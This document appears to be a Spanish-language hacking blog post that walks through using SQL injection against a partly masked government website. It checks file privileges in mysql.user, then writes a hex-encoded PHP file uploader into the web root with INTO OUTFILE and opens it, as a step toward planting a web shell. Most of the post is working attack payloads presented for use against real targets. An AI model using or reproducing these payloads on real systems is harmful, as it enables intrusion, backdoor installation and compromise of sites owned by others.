Upload shell SQl









 SQL Injection "hacer cargar la shell X


  • Tu debe tener privilegios de escritura y un directorio de escritura (donde usted tiene que subir su cáscara)
  • Ruta raíz (es decir, / var / www / sitio web / o C: \ xampp \data ....)
  • Mágico Qoutes debe permitir
Vamos a comprobar los permisos de escritura?
¿Cómo comprobarlo?

group_concat(user,0x203a20,file_priv) from mysql.user --+

presidxxxxx.gob./file/vuln.php?id=-1 union select group_concat(user,0x203a20,file_priv) from mysql.user-- -.


GROUP_CONCAT (usuario, 0x203a20, file_priv) de mysql.user
Así que nuestra consulta será así
http: //presidenxxx.gob./file/.php id = -1 union select GROUP_CONCAT (usuario, 0x203a20, file_priv) de mysql.user-- -



Si decir Y después usuario actual, tenemos un acceso. El siguiente paso se permite cargador escritura uo usando INTO OUTFILE 
'Nuestro script aquí' INTO OUTFILE "ruta de archivo"
Usted puede ver como van los codigos de nuestro upl. y como va todo montado
http://presidexxxx.gob.x/file.php?id=-NULL union select 0x92020202020203c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d7d3f3e3c3f706870206563686f202755706c6f616465723c62723e273b6563686f20273c62723e273b6563686f20273c666f726d20616374696f6e3d2222206d6574686f643d22706f73742220656e63747970653d226d756c7469706172742f666f726d2d6461746122206e616d653d2275706c6f61646572222069643d2275706c6f61646572223e273b6563686f20273c696e70757420747970653d2266696c6522206e616d653d2266696c65222073697a653d223530223e3c696e707574206e616d653d225f75706c2220747970653d227375626d6974222069643d225f75706c222076616c75653d2255706c6f6164223e3c2f666f726d3e273b69662820245f504f53545b275f75706c275d203d3d202255706c6f6164222029207b69662840636f707928245f46494c45535b2766696c65275d5b27746d705f6e616d65275d2c20245f46494c45535b2766696c65275d5b276e616d65275d2929207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d656c7365207b206563686f20273c623e55706c6f6164202121213c2f623e3c62723e3c62723e273b207d7d3f3e INTO OUTFILE "C://xampp//htdocs//file//upload.php"
Y luego abrirlo
http: //presidenxxxgob./file/upload.php
y ahora revisamos si ya cargo nuestro (Upload) vamos alla >D

pues bien ya que tenemos nuestro upload en php montado en esta web ahora devemos buscar nuestra shell para penetrar  


0 comentarios:

Publicar un comentario